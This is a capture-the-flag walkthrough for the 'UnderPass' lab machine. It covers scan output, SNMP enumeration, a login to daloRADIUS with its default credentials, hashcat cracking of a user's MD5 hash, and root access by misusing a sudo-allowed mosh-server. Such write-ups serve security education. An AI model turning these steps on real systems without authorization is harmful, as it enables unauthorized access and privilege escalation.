UnderPass

Synopsis

UnderPass is a linux easy machine created by dakkmaddy. The UDP port 161 is running SNMP service. The enumeration to SNMP reveals the daloradius server is used in the website and enumerating daloradius github repository the login page for users and operators are found. The default credential for daloradius gives us access to daloradius dashboard as an operator. The hash for user svcMosh is present in the user list. Crack the hash and login into system via ssh as svcMosh. The svcMosh user is privileged to use mosh-server as sudo which will be exploited for getting shell as root.

Difficulty

Points

Release Date

Expire Date

Linux

Easy

21-12-2024

10-May-2025

Enumeration

Nmap

Started the nmap scan and found ssh and http services running.

nmap -Pn -sC -sV --min-rate=1000 10.10.11.48
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-15 06:54 EDT
Nmap scan report for 10.10.11.48
Host is up (0.74s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.05 seconds

Scanning the UDP ports reveals the snmp service running.

nmap -Pn -sU --min-rate=5000 10.10.11.48
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-15 07:31 EDT
Nmap scan report for 10.10.11.48
Host is up (0.67s latency).
Not shown: 988 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
22/udp    closed ssh
161/udp   open   snmp
1419/udp  closed timbuktu-srv3
1433/udp  closed ms-sql-s
2222/udp  closed msantipiracy
5010/udp  closed telelpathstart
10080/udp closed amanda
17101/udp closed unknown
20117/udp closed unknown
20288/udp closed unknown
49188/udp closed unknown
49199/udp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 26.50 seconds

nmap -Pn -sU -sC -sV -p 161 10.10.11.48 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-15 07:32 EDT
Nmap scan report for 10.10.11.48
Host is up (0.60s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: c7ad5c4856d1cf6600000000
|   snmpEngineBoots: 31
|_  snmpEngineTime: 15h30m56s
| snmp-sysdescr: Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
|_  System uptime: 15h30m57.39s (5585739 timeticks)
Service Info: Host: UnDerPass.htb is the only daloradius server in the basin!

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.51 seconds

SNMP - Port 161

snmpwalk reveals steve@underpass.htb mail and UnDerPass.htb is only the daloradius server.

snmpwalk -v 2c -c public 10.10.11.48
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (6896383) 19:09:23.83
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (6899041) 19:09:50.41
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E9 05 0F 0E 32 0E 00 2B 00 00 
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-126-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 1
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 225
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
iso.3.6.1.2.1.25.1.7.0 = No more variables left in this MIB View (It is past the end of the MIB tree)

Web - Port 80

The website shows the default apache2 server page.

Fuzzing - Directories and Pages

feroxbuster -u http://10.10.11.48                                                                                     
                                                                                                                                                       
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.11.48
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       22l      105w     5952c http://10.10.11.48/icons/ubuntu-logo.png
200      GET      363l      961w    10671c http://10.10.11.48/
[####################] - 10m    30005/30005   0s      found:2       errors:1470   
[####################] - 10m    30000/30000   51/s    http://10.10.11.48/

The fuzzing didn't give us much of the stuff. The snmp mentioned the daloradius server. Fuzzing directories and pages. So trying with adding daloradius server.

feroxbuster -u http://10.10.11.48/daloradius
                                                                                   
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.11.48/daloradius
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      315c http://10.10.11.48/daloradius => http://10.10.11.48/daloradius/
301      GET        9l       28w      323c http://10.10.11.48/daloradius/library => http://10.10.11.48/daloradius/library/
301      GET        9l       28w      319c http://10.10.11.48/daloradius/doc => http://10.10.11.48/daloradius/doc/
301      GET        9l       28w      319c http://10.10.11.48/daloradius/app => http://10.10.11.48/daloradius/app/
301      GET        9l       28w      323c http://10.10.11.48/daloradius/contrib => http://10.10.11.48/daloradius/contrib/
301      GET        9l       28w      326c http://10.10.11.48/daloradius/app/common => http://10.10.11.48/daloradius/app/common/
301      GET        9l       28w      325c http://10.10.11.48/daloradius/app/users => http://10.10.11.48/daloradius/app/users/
301      GET        9l       28w      321c http://10.10.11.48/daloradius/setup => http://10.10.11.48/daloradius/setup/
301      GET        9l       28w      335c http://10.10.11.48/daloradius/app/common/includes => http://10.10.11.48/daloradius/app/common/includes/
301      GET        9l       28w      332c http://10.10.11.48/daloradius/app/users/static => http://10.10.11.48/daloradius/app/users/static/
301      GET        9l       28w      330c http://10.10.11.48/daloradius/app/users/lang => http://10.10.11.48/daloradius/app/users/lang/
301      GET        9l       28w      333c http://10.10.11.48/daloradius/app/users/library => http://10.10.11.48/daloradius/app/users/library/
301      GET        9l       28w      333c http://10.10.11.48/daloradius/app/common/static => http://10.10.11.48/daloradius/app/common/static/
301      GET        9l       28w      336c http://10.10.11.48/daloradius/app/common/templates => http://10.10.11.48/daloradius/app/common/templates/
301      GET        9l       28w      333c http://10.10.11.48/daloradius/app/users/include => http://10.10.11.48/daloradius/app/users/include/
301      GET        9l       28w      331c http://10.10.11.48/daloradius/contrib/scripts => http://10.10.11.48/daloradius/contrib/scripts/
301      GET        9l       28w      344c http://10.10.11.48/daloradius/app/users/library/javascript => http://10.10.11.48/daloradius/app/users/library/javascript/
301      GET        9l       28w      340c http://10.10.11.48/daloradius/app/common/static/images => http://10.10.11.48/daloradius/app/common/static/images/
301      GET        9l       28w      336c http://10.10.11.48/daloradius/app/common/static/js => http://10.10.11.48/daloradius/app/common/static/js/
301      GET        9l       28w      337c http://10.10.11.48/daloradius/app/common/static/css => http://10.10.11.48/daloradius/app/common/static/css/
301      GET        9l       28w      326c http://10.10.11.48/daloradius/contrib/db => http://10.10.11.48/daloradius/contrib/db/
301      GET        9l       28w      340c http://10.10.11.48/daloradius/app/users/include/config => http://10.10.11.48/daloradius/app/users/include/config/
301      GET        9l       28w      340c http://10.10.11.48/daloradius/app/users/include/common => http://10.10.11.48/daloradius/app/users/include/common/
301      GET        9l       28w      333c http://10.10.11.48/daloradius/contrib/heartbeat => http://10.10.11.48/daloradius/contrib/heartbeat/
[####################] - 15m   540094/540094  0s      found:24      errors:298324 
[####################] - 10m    30000/30000   53/s    http://10.10.11.48/daloradius/ 
[####################] - 10m    30000/30000   50/s    http://10.10.11.48/daloradius/app/ 
[####################] - 10m    30000/30000   48/s    http://10.10.11.48/daloradius/library/ 
[####################] - 10m    30000/30000   48/s    http://10.10.11.48/daloradius/doc/ 
[####################] - 9m     30000/30000   57/s    http://10.10.11.48/daloradius/contrib/ 
[####################] - 11m    30000/30000   45/s    http://10.10.11.48/daloradius/app/common/ 
[####################] - 11m    30000/30000   45/s    http://10.10.11.48/daloradius/app/users/ 
[####################] - 10m    30000/30000   49/s    http://10.10.11.48/daloradius/setup/ 
[####################] - 5m     30000/30000   101/s   http://10.10.11.48/daloradius/app/common/templates/

daloRADIUS is an advanced RADIUS web management application for managing hotspots and general-purpose ISP deployments. It features user management, graphical reporting, accounting, a billing engine, and integrates with OpenStreetMap for geolocation. The system is based on FreeRADIUS with which it shares access to the backend database.

The daloradius github repository shows the users and operators login.php page and requesting the login.php gives us the daloradius login page.

Foothold

Shell - svcMosh

Web surfing about daloradius default credentials presents Administrator:radius credential and the credentials is valid for operator.

The daloradius dashboard provides the user list. Only svcMosh user and it's hash is present.

Cracking hash using hashcat.

hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #1: cpu-haswell-AMD Ryzen 3 7320U with Radeon Graphics, 2553/5170 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

412dd4759978acfcc81deab01b382403:underwaterfriends        
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 412dd4759978acfcc81deab01b382403
Time.Started.....: Fri May 16 01:07:49 2025 (1 sec)
Time.Estimated...: Fri May 16 01:07:50 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4260.1 kH/s (0.21ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2985984/14344385 (20.82%)
Rejected.........: 0/2985984 (0.00%)
Restore.Point....: 2981888/14344385 (20.79%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: unicornn -> unc112886
Hardware.Mon.#1..: Temp: 47c Util: 25%

Started: Fri May 16 01:07:47 2025
Stopped: Fri May 16 01:07:51 2025

Using the cracked password to login into svcMosh via ssh.

sh svcMosh@10.10.11.48                    
The authenticity of host '10.10.11.48 (10.10.11.48)' can't be established.
ED25519 key fingerprint is SHA256:zrDqCvZoLSy6MxBOPcuEyN926YtFC94ZCJ5TWRS0VaM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.48' (ED25519) to the list of known hosts.
svcMosh@10.10.11.48's password: 
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Fri May 16 04:50:00 AM UTC 2025

  System load:  0.0               Processes:             226
  Usage of /:   52.2% of 6.56GB   Users logged in:       0
  Memory usage: 10%               IPv4 address for eth0: 10.10.11.48
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sat Jan 11 13:29:47 2025 from 10.10.14.62
svcMosh@underpass:~$

The user.txt file contains the user flag 👏

Privilege Escalation

Pillaging - svcMosh [ user ]

The svcMosh user is privilege to run /usr/bin/mosh-server as sudo.

svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server
svcMosh@underpass:~$

Shell - root

Mosh is a mobile shell tool used to connect from a client computer to a server over the Internet, similar to SSH but with additional features meant to improve usability for mobile users.

Running the mosh-server as sudo gives us port and mosh key.

svcMosh@underpass:~$ sudo mosh-server


MOSH CONNECT 60001 xZmrCtUg7/lhYpY82VEQEg

mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

[mosh-server detached, pid = 2857]
svcMosh@underpass:~$

Connecting to the port 60001 using mosh-client gives us MOSH_KEY environment variable not found error. Create the MOSH_KEY environment variable and running the mosh-client.

svcMosh@underpass:~$ MOSH_KEY=a7JjCnxWIsnm8/fv2se4ow mosh-client 127.0.0.1 60002

Nothing received from server on UDP port 60002 occurs sometimes so we have to again run the mosh-server.

root@underpass:~# ls
root.txt
root@underpass:~#

The root.txt file contains the root flag 🎉

Proof of Concept

The below video provides the PoC of UnderPass machine.

PreviousHeal NextLinkVortex

Last updated 8 months ago

hashtagSynopsis

hashtagEnumeration

hashtagNmap

hashtagSNMP - Port 161

hashtagWeb - Port 80

hashtagFuzzing - Directories and Pages

hashtagFoothold

hashtagShell - svcMosh

hashtagPrivilege Escalation

hashtagPillaging - svcMosh [ user ]

hashtagShell - root

hashtagProof of Concept

Synopsis

Enumeration

Nmap

SNMP - Port 161

Web - Port 80

Fuzzing - Directories and Pages

Foothold

Shell - svcMosh

Privilege Escalation

Pillaging - svcMosh [ user ]

Shell - root

Proof of Concept